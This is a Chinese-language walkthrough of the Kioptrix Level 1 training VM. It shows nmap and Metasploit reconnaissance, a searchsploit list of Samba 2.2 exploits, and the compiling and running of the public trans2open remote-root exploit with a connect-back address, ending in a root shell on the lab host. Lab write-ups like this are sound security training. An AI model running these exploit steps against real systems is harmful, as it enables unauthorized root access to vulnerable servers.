靶机Kioptrix: Level 1 (#1)攻略
首先用nmap扫描一下目标:
# nmap -sV 192.168.140.144 Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-03 08:45 EDT Nmap scan report for 192.168.140.144 Host is up (0.0038s latency). Not shown: 994 closed tcp ports (reset) PORT STATE SERVICE VERSION 22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99) 80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b) 111/tcp open rpcbind 2 (RPC #100000) 139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP) 443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b 1024/tcp open status 1 (RPC #100024) MAC Address: 00:0C:29:D3:35:1E (VMware) Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 15.73 seconds
虽然开放的端口比较多,22,80,111,139,443,1024,但是根据版本搜索相应的服务漏洞都没有收获。
但是139端口是一个比较危险的端口,-sV没有得到samba的版本,因此需要用其他方式尝试获得更进一步的信息,用metasploit的smb_version模块得到相应的版本信息:
msf6 > use auxiliary/scanner/smb/smb_version msf6 auxiliary(scanner/smb/smb_version) > show options Module options (auxiliary/scanner/smb/smb_version): Name Current Setting Required Description ---- --------------- -------- ----------- RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit THREADS 1 yes The number of concurrent threads (max one per host) msf6 auxiliary(scanner/smb/smb_version) > set RHOSTS 192.168.140.144 RHOSTS => 192.168.140.144 msf6 auxiliary(scanner/smb/smb_version) > run [*] 192.168.140.144:139 - SMB Detected (versions:) (preferred dialect:) (signatures:optional) [*] 192.168.140.144:139 - Host could not be identified: Unix (Samba 2.2.1a) [*] 192.168.140.144: - Scanned 1 of 1 hosts (100% complete)
查询samba 2.2版本有什么漏洞可以利用:
─# searchsploit Samba 2.2 130 ⨯ ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path ---------------------------------------------------------------------------------------------------------------------------- --------------------------------- Samba 2.0.x/2.2 - Arbitrary File Creation | unix/remote/20968.txt Samba 2.2.0 < 2.2.8 (OSX) - trans2open Overflow (Metasploit) | osx/remote/9924.rb Samba 2.2.2 < 2.2.6 - 'nttrans' Remote Buffer Overflow (Metasploit) (1) | linux/remote/16321.rb Samba 2.2.8 (BSD x86) - 'trans2open' Remote Overflow (Metasploit) | bsd_x86/remote/16880.rb Samba 2.2.8 (Linux Kernel 2.6 / Debian / Mandrake) - Share Privilege Escalation | linux/local/23674.txt Samba 2.2.8 (Linux x86) - 'trans2open' Remote Overflow (Metasploit) | linux_x86/remote/16861.rb Samba 2.2.8 (OSX/PPC) - 'trans2open' Remote Overflow (Metasploit) | osx_ppc/remote/16876.rb Samba 2.2.8 (Solaris SPARC) - 'trans2open' Remote Overflow (Metasploit) | solaris_sparc/remote/16330.rb Samba 2.2.8 - Brute Force Method Remote Command Execution | linux/remote/55.c Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (1) | unix/remote/22468.c Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (2) | unix/remote/22469.c Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (3) | unix/remote/22470.c Samba 2.2.x - 'call_trans2open' Remote Buffer Overflow (4) | unix/remote/22471.txt Samba 2.2.x - 'nttrans' Remote Overflow (Metasploit) | linux/remote/9936.rb Samba 2.2.x - CIFS/9000 Server A.01.x Packet Assembling Buffer Overflow | unix/remote/22356.c Samba 2.2.x - Remote Buffer Overflow | linux/remote/7.pl Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c Samba < 2.2.8 (Linux/BSD) - Remote Code Execution | multiple/remote/10.c Samba < 3.0.20 - Remote Heap Overflow | linux/remote/7701.txt Samba < 3.6.2 (x86) - Denial of Service (PoC) | linux_x86/dos/36741.py ---------------------------------------------------------------------------------------------------------------------------- ----------------------------
可以看到这个漏洞利用代码值得关注,其实穷最开始用的是metasploit里本身的trans2open漏洞利用,但是似乎很难成功。然后转向Samba < 2.2.8 (Linux/BSD) - Remote Code Execution
用locate命令定位一下 multiple/remote/10.c,然后拷贝到家目录,用gcc进行编译 | multiple/remote/10.c
# locate multiple/remote/10.c /usr/share/exploitdb/exploits/multiple/remote/10.c ┌──(root💀kali)-[/usr/…/exploitdb/exploits/multiple/remote] └─# cp 10.c ~ ┌──(root💀kali)-[/usr/…/exploitdb/exploits/multiple/remote] └─# cd ~ ┌──(root💀kali)-[~] └─# gcc 10.c -o samba_jason
然后执行编译好的代码:./samba_jason
# ./samba_jason samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) -------------------------------------------------------------- Usage: ./samba_jason [-bBcCdfprsStv] [host] -b <platform> bruteforce (0 = Linux, 1 = FreeBSD/NetBSD, 2 = OpenBSD 3.1 and prior, 3 = OpenBSD 3.2) -B <step> bruteforce steps (default = 300) -c <ip address> connectback ip address -C <max childs> max childs for scan/bruteforce mode (default = 40) -d <delay> bruteforce/scanmode delay in micro seconds (default = 100000) -f force -p <port> port to attack (default = 139) -r <ret> return address -s scan mode (random) -S <network> scan mode -t <type> presets (0 for a list) -v verbose mode
─# ./samba_jason -b 0 -c 192.168.140.138 -p 139 192.168.140.144 130 ⨯ samba-2.2.8 < remote root exploit by eSDee (www.netric.org|be) -------------------------------------------------------------- + Bruteforce mode. (Linux) + Host is running samba. + Worked! -------------------------------------------------------------- *** JE MOET JE MUIL HOUWE Linux kioptrix.level1 2.4.7-10 #1 Thu Sep 6 16:46:36 EDT 2001 i686 unknown uid=0(root) gid=0(root) groups=99(nobody) id uid=0(root) gid=0(root) groups=99(nobody) whoami root
STRIVE FOR PROGRESS,NOT FOR PERFECTION
